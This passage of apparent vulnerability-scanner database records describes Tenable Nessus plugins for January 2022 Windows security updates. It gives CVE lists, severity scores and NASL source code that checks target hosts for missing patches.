A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-21843, CVE-2022-21847, CVE-2022-21848, CVE-2022-21883, CVE-2022-21889, CVE-2022-21890, CVE-2022-21918)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-11T00:00:00", "type": "nessus", "title": "KB5009555: Windows Server 2022 Security Updates (January 2022)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22947", "CVE-2021-36976", "CVE-2022-21833", "CVE-2022-21834", "CVE-2022-21835", "CVE-2022-21836", "CVE-2022-21838", "CVE-2022-21843", "CVE-2022-21847", "CVE-2022-21848", "CVE-2022-21849", "CVE-2022-21850", "CVE-2022-21851", "CVE-2022-21852", "CVE-2022-21857", "CVE-2022-21858", "CVE-2022-21859", "CVE-2022-21860", "CVE-2022-21861", "CVE-2022-21862", "CVE-2022-21863", "CVE-2022-21864", "CVE-2022-21865", "CVE-2022-21866", "CVE-2022-21867", "CVE-2022-21868", "CVE-2022-21869", "CVE-2022-21870", "CVE-2022-21871", "CVE-2022-21872", "CVE-2022-21873", "CVE-2022-21874", "CVE-2022-21875", "CVE-2022-21876", "CVE-2022-21877", "CVE-2022-21878", "CVE-2022-21879", "CVE-2022-21880", "CVE-2022-21881", "CVE-2022-21882", "CVE-2022-21883", "CVE-2022-21884", "CVE-2022-21885", "CVE-2022-21887", "CVE-2022-21888", "CVE-2022-21889", "CVE-2022-21890", "CVE-2022-21892", "CVE-2022-21893", "CVE-2022-21894", "CVE-2022-21895", "CVE-2022-21896", "CVE-2022-21897", "CVE-2022-21898", "CVE-2022-21900", "CVE-2022-21901", "CVE-2022-21902", "CVE-2022-21903", "CVE-2022-21904", "CVE-2022-21905", "CVE-2022-21906", "CVE-2022-21907", "CVE-2022-21908", "CVE-2022-21910", "CVE-2022-21913", "CVE-2022-21914", "CVE-2022-21915", "CVE-2022-21916", "CVE-2022-21918", "CVE-2022-21919", "CVE-2022-21920", "CVE-2022-21921", "CVE-2022-21922", "CVE-2022-21924", "CVE-2022-21925", "CVE-2022-21928", "CVE-2022-21958", "CVE-2022-21959", "CVE-2022-21960", "CVE-2022-21961", "CVE-2022-21962", "CVE-2022-21963"], "modified": "2023-01-17T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JAN_5009555.NASL", "href": "https://www.tenable.com/plugins/nessus/156620", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc. \n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156620);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\n \"CVE-2021-22947\",\n \"CVE-2021-36976\",\n \"CVE-2022-21833\",\n \"CVE-2022-21834\",\n \"CVE-2022-21835\",\n \"CVE-2022-21836\",\n \"CVE-2022-21838\",\n \"CVE-2022-21843\",\n \"CVE-2022-21847\",\n \"CVE-2022-21848\",\n \"CVE-2022-21849\",\n \"CVE-2022-21850\",\n \"CVE-2022-21851\",\n \"CVE-2022-21852\",\n \"CVE-2022-21857\",\n \"CVE-2022-21858\",\n \"CVE-2022-21859\",\n \"CVE-2022-21860\",\n \"CVE-2022-21861\",\n \"CVE-2022-21862\",\n \"CVE-2022-21863\",\n \"CVE-2022-21864\",\n \"CVE-2022-21865\",\n \"CVE-2022-21866\",\n \"CVE-2022-21867\",\n \"CVE-2022-21868\",\n \"CVE-2022-21869\",\n \"CVE-2022-21870\",\n \"CVE-2022-21871\",\n \"CVE-2022-21872\",\n \"CVE-2022-21873\",\n \"CVE-2022-21874\",\n \"CVE-2022-21875\",\n \"CVE-2022-21876\",\n \"CVE-2022-21877\",\n \"CVE-2022-21878\",\n \"CVE-2022-21879\",\n \"CVE-2022-21880\",\n \"CVE-2022-21881\",\n \"CVE-2022-21882\",\n \"CVE-2022-21883\",\n \"CVE-2022-21884\",\n \"CVE-2022-21885\",\n \"CVE-2022-21888\",\n \"CVE-2022-21889\",\n \"CVE-2022-21890\",\n \"CVE-2022-21892\",\n \"CVE-2022-21893\",\n \"CVE-2022-21894\",\n \"CVE-2022-21895\",\n \"CVE-2022-21896\",\n \"CVE-2022-21897\",\n \"CVE-2022-21898\",\n \"CVE-2022-21900\",\n \"CVE-2022-21901\",\n \"CVE-2022-21902\",\n \"CVE-2022-21903\",\n \"CVE-2022-21904\",\n \"CVE-2022-21905\",\n \"CVE-2022-21906\",\n \"CVE-2022-21907\",\n \"CVE-2022-21908\",\n \"CVE-2022-21910\",\n \"CVE-2022-21913\",\n \"CVE-2022-21914\",\n \"CVE-2022-21915\",\n \"CVE-2022-21916\",\n \"CVE-2022-21918\",\n \"CVE-2022-21919\",\n \"CVE-2022-21920\",\n \"CVE-2022-21921\",\n \"CVE-2022-21922\",\n \"CVE-2022-21924\",\n \"CVE-2022-21925\",\n \"CVE-2022-21928\",\n \"CVE-2022-21958\",\n \"CVE-2022-21959\",\n \"CVE-2022-21960\",\n \"CVE-2022-21961\",\n \"CVE-2022-21962\",\n \"CVE-2022-21963\"\n );\n script_xref(name:\"MSKB\", value:\"5009555\");\n script_xref(name:\"MSFT\", value:\"MS22-5009555\");\n script_xref(name:\"IAVA\", value:\"2022-A-0012-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0016-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/02/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0001\");\n\n script_name(english:\"KB5009555: Windows Server 2022 Security Updates (January 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Windows Server 2022 installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Windows Server 2022 installation on the remote host is missing\nsecurity updates. It is, therefore, affected by multiple\nvulnerabilities:\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2022-21836)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-21849,\n CVE-2022-21850, CVE-2022-21851, CVE-2022-21874,\n CVE-2022-21888, CVE-2022-21892, CVE-2022-21893,\n CVE-2022-21907, CVE-2022-21922, CVE-2022-21928,\n CVE-2022-21958, CVE-2022-21959, CVE-2022-21960,\n CVE-2022-21961, CVE-2022-21962, CVE-2022-21963)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21900, CVE-2022-21905,\n CVE-2022-21906, CVE-2022-21913, CVE-2022-21921,\n CVE-2022-21924, CVE-2022-21925)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-21876, CVE-2022-21877,\n CVE-2022-21880, CVE-2022-21915)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835,\n CVE-2022-21838, CVE-2022-21852, CVE-2022-21857,\n CVE-2022-21858, CVE-2022-21861, CVE-2022-21862,\n CVE-2022-21864, CVE-2022-21866, CVE-2022-21870,\n CVE-2022-21871, CVE-2022-21872, CVE-2022-21873,\n CVE-2022-21881, CVE-2022-21882, CVE-2022-21885,\n CVE-2022-21887, CVE-2022-21896, CVE-2022-21897,\n CVE-2022-21901, CVE-2022-21902, CVE-2022-21908,\n CVE-2022-21914, CVE-2022-21916, CVE-2022-21919,\n CVE-2022-21920)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-21843,\n CVE-2022-21847, CVE-2022-21848, CVE-2022-21883,\n CVE-2022-21889, CVE-2022-21890, CVE-2022-21918)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5009555\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB5009555 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-21907\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS22-01\";\nkbs = make_list('5009555');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'20348',\n rollup_date:'01_2022',\n bulletin:bulletin,\n rollup_kb_list:[5009555])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-17T21:55:29", "description": "The remote Windows host is missing security update 5009543.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21849, CVE-2022-21850, CVE-2022-21851, CVE-2022-21874, CVE-2022-21878, CVE-2022-21892, CVE-2022-21893, CVE-2022-21922, CVE-2022-21928, CVE-2022-21958, CVE-2022-21959, CVE-2022-21960, CVE-2022-21961, CVE-2022-21962, CVE-2022-21963)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-21876, CVE-2022-21880, CVE-2022-21904, CVE-2022-21915)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21900, CVE-2022-21905, CVE-2022-21913, CVE-2022-21924, CVE-2022-21925)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2022-21836)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-21843, CVE-2022-21848, CVE-2022-21883, CVE-2022-21889, CVE-2022-21890)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835, CVE-2022-21838, CVE-2022-21857, CVE-2022-21859, CVE-2022-21860, CVE-2022-21862, CVE-2022-21863, CVE-2022-21864, CVE-2022-21866, CVE-2022-21867, CVE-2022-21868, CVE-2022-21870, CVE-2022-21871, CVE-2022-21873, CVE-2022-21875, CVE-2022-21879, CVE-2022-21881, CVE-2022-21884, CVE-2022-21885, CVE-2022-21895, CVE-2022-21897, CVE-2022-21901, CVE-2022-21902, CVE-2022-21903, CVE-2022-21908, CVE-2022-21910, CVE-2022-21914, CVE-2022-21916, CVE-2022-21919, CVE-2022-21920)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-11T00:00:00", "type": "nessus", "title": "KB5009543: Windows 10 Version 20H2 / 21H1 / 21H2 Security Update (January 2022) ", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22947", "CVE-2021-36976", "CVE-2022-21833", "CVE-2022-21834", "CVE-2022-21835", "CVE-2022-21836", "CVE-2022-21838", "CVE-2022-21843", "CVE-2022-21847", "CVE-2022-21848", "CVE-2022-21849", "CVE-2022-21850", "CVE-2022-21851", "CVE-2022-21852", "CVE-2022-21857", "CVE-2022-21858", "CVE-2022-21859", "CVE-2022-21860", "CVE-2022-21861", "CVE-2022-21862", "CVE-2022-21863", "CVE-2022-21864", "CVE-2022-21865", "CVE-2022-21866", "CVE-2022-21867", "CVE-2022-21868", "CVE-2022-21869", "CVE-2022-21870", "CVE-2022-21871", "CVE-2022-21872", "CVE-2022-21873", "CVE-2022-21874", "CVE-2022-21875", "CVE-2022-21876", "CVE-2022-21877", "CVE-2022-21878", "CVE-2022-21879", "CVE-2022-21880", "CVE-2022-21881", "CVE-2022-21882", "CVE-2022-21883", "CVE-2022-21884", "CVE-2022-21885", "CVE-2022-21888", "CVE-2022-21889", "CVE-2022-21890", "CVE-2022-21892", "CVE-2022-21893", "CVE-2022-21894", "CVE-2022-21895", "CVE-2022-21896", "CVE-2022-21897", "CVE-2022-21898", "CVE-2022-21900", "CVE-2022-21901", "CVE-2022-21902", "CVE-2022-21903", "CVE-2022-21904", "CVE-2022-21905", "CVE-2022-21906", "CVE-2022-21907", "CVE-2022-21908", "CVE-2022-21910", "CVE-2022-21912", "CVE-2022-21913", "CVE-2022-21914", "CVE-2022-21915", "CVE-2022-21916", "CVE-2022-21918", "CVE-2022-21919", "CVE-2022-21920", "CVE-2022-21921", "CVE-2022-21922", "CVE-2022-21924", "CVE-2022-21925", "CVE-2022-21928", "CVE-2022-21958", "CVE-2022-21959", "CVE-2022-21960", "CVE-2022-21961", "CVE-2022-21962", "CVE-2022-21963"], "modified": "2023-01-17T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JAN_5009543.NASL", "href": "https://www.tenable.com/plugins/nessus/156617", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156617);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\n \"CVE-2021-22947\",\n \"CVE-2021-36976\",\n \"CVE-2022-21833\",\n \"CVE-2022-21834\",\n \"CVE-2022-21835\",\n \"CVE-2022-21836\",\n \"CVE-2022-21838\",\n \"CVE-2022-21843\",\n \"CVE-2022-21847\",\n \"CVE-2022-21848\",\n \"CVE-2022-21849\",\n \"CVE-2022-21850\",\n \"CVE-2022-21851\",\n \"CVE-2022-21852\",\n \"CVE-2022-21857\",\n \"CVE-2022-21858\",\n \"CVE-2022-21859\",\n \"CVE-2022-21860\",\n \"CVE-2022-21861\",\n \"CVE-2022-21862\",\n \"CVE-2022-21863\",\n \"CVE-2022-21864\",\n \"CVE-2022-21865\",\n \"CVE-2022-21866\",\n \"CVE-2022-21867\",\n \"CVE-2022-21868\",\n \"CVE-2022-21869\",\n \"CVE-2022-21870\",\n \"CVE-2022-21871\",\n \"CVE-2022-21872\",\n \"CVE-2022-21873\",\n \"CVE-2022-21874\",\n \"CVE-2022-21875\",\n \"CVE-2022-21876\",\n \"CVE-2022-21877\",\n \"CVE-2022-21878\",\n \"CVE-2022-21879\",\n \"CVE-2022-21880\",\n \"CVE-2022-21881\",\n \"CVE-2022-21882\",\n \"CVE-2022-21883\",\n \"CVE-2022-21884\",\n \"CVE-2022-21885\",\n \"CVE-2022-21888\",\n \"CVE-2022-21889\",\n \"CVE-2022-21890\",\n \"CVE-2022-21892\",\n \"CVE-2022-21893\",\n \"CVE-2022-21894\",\n \"CVE-2022-21895\",\n \"CVE-2022-21896\",\n \"CVE-2022-21897\",\n \"CVE-2022-21898\",\n \"CVE-2022-21900\",\n \"CVE-2022-21901\",\n \"CVE-2022-21902\",\n \"CVE-2022-21904\",\n \"CVE-2022-21905\",\n \"CVE-2022-21906\",\n \"CVE-2022-21907\",\n \"CVE-2022-21908\",\n \"CVE-2022-21910\",\n \"CVE-2022-21912\",\n \"CVE-2022-21913\",\n \"CVE-2022-21914\",\n \"CVE-2022-21915\",\n \"CVE-2022-21916\",\n \"CVE-2022-21918\",\n \"CVE-2022-21919\",\n \"CVE-2022-21920\",\n \"CVE-2022-21921\",\n \"CVE-2022-21922\",\n \"CVE-2022-21924\",\n \"CVE-2022-21925\",\n \"CVE-2022-21928\",\n \"CVE-2022-21958\",\n \"CVE-2022-21959\",\n \"CVE-2022-21960\",\n \"CVE-2022-21961\",\n \"CVE-2022-21962\",\n \"CVE-2022-21963\"\n );\n script_xref(name:\"MSKB\", value:\"5009543\");\n script_xref(name:\"MSFT\", value:\"MS22-5009543\");\n script_xref(name:\"IAVA\", value:\"2022-A-0012-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0016-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/02/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0001\");\n\n script_name(english:\"KB5009543: Windows 10 Version 20H2 / 21H1 / 21H2 Security Update (January 2022) \");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5009543.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-21849,\n CVE-2022-21850, CVE-2022-21851, CVE-2022-21874,\n CVE-2022-21878, CVE-2022-21892, CVE-2022-21893,\n CVE-2022-21922, CVE-2022-21928, CVE-2022-21958,\n CVE-2022-21959, CVE-2022-21960, CVE-2022-21961,\n CVE-2022-21962, CVE-2022-21963)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-21876, CVE-2022-21880,\n CVE-2022-21904, CVE-2022-21915)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21900, CVE-2022-21905,\n CVE-2022-21913, CVE-2022-21924, CVE-2022-21925)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2022-21836)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-21843,\n CVE-2022-21848, CVE-2022-21883, CVE-2022-21889,\n CVE-2022-21890)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835,\n CVE-2022-21838, CVE-2022-21857, CVE-2022-21859,\n CVE-2022-21860, CVE-2022-21862, CVE-2022-21863,\n CVE-2022-21864, CVE-2022-21866, CVE-2022-21867,\n CVE-2022-21868, CVE-2022-21870, CVE-2022-21871,\n CVE-2022-21873, CVE-2022-21875, CVE-2022-21879,\n CVE-2022-21881, CVE-2022-21884, CVE-2022-21885,\n CVE-2022-21895, CVE-2022-21897, CVE-2022-21901,\n CVE-2022-21902, CVE-2022-21903, CVE-2022-21908,\n CVE-2022-21910, CVE-2022-21914, CVE-2022-21916,\n CVE-2022-21919, CVE-2022-21920)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5009543\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5009543.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-21907\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS22-01\";\nkbs = make_list('5009543');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'19042',\n rollup_date:'01_2022',\n bulletin:bulletin,\n rollup_kb_list:[5009543]) \n|| \n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'19043',\n rollup_date:'01_2022',\n bulletin:bulletin,\n rollup_kb_list:[5009543]) \n\n|| \n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'19044',\n rollup_date:'01_2022',\n bulletin:bulletin,\n rollup_kb_list:[5009543]) \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-17T21:55:11", "description": "The remote Windows host is missing security update 5009557.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2022-21836)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-21839, CVE-2022-21843, CVE-2022-21847, CVE-2022-21848, CVE-2022-21883, CVE-2022-21889, CVE-2022-21890, CVE-2022-21918)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-21876, CVE-2022-21877, CVE-2022-21880, CVE-2022-21904, CVE-2022-21915)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21849, CVE-2022-21850, CVE-2022-21851, CVE-2022-21874, CVE-2022-21878, CVE-2022-21888, CVE-2022-21892, CVE-2022-21893, CVE-2022-21898, CVE-2022-21907, CVE-2022-21912, CVE-2022-21922, CVE-2022-21928, CVE-2022-21958, CVE-2022-21959, CVE-2022-21960, CVE-2022-21961, CVE-2022-21962, CVE-2022-21963)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835, CVE-2022-21838, CVE-2022-21852, CVE-2022-21857, CVE-2022-21858, CVE-2022-21859, CVE-2022-21860, CVE-2022-21861, CVE-2022-21862, CVE-2022-21863, CVE-2022-21864, CVE-2022-21865, CVE-2022-21866, CVE-2022-21867, CVE-2022-21868, CVE-2022-21869, CVE-2022-21870, CVE-2022-21871, CVE-2022-21872, CVE-2022-21873, CVE-2022-21875, CVE-2022-21879, CVE-2022-21881, CVE-2022-21882, CVE-2022-21884, CVE-2022-21885, CVE-2022-21895, CVE-2022-21896, CVE-2022-21897, CVE-2022-21901, CVE-2022-21902, CVE-2022-21903, CVE-2022-21908, CVE-2022-21910, CVE-2022-21914, CVE-2022-21916, CVE-2022-21919, CVE-2022-21920)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21900, CVE-2022-21905, CVE-2022-21906, CVE-2022-21913, CVE-2022-21924, CVE-2022-21925)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-11T00:00:00", "type": "nessus", "title": "KB5009557: Windows 10 Version 1809 and Windows Server 2019 Security Update (January 2022)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": 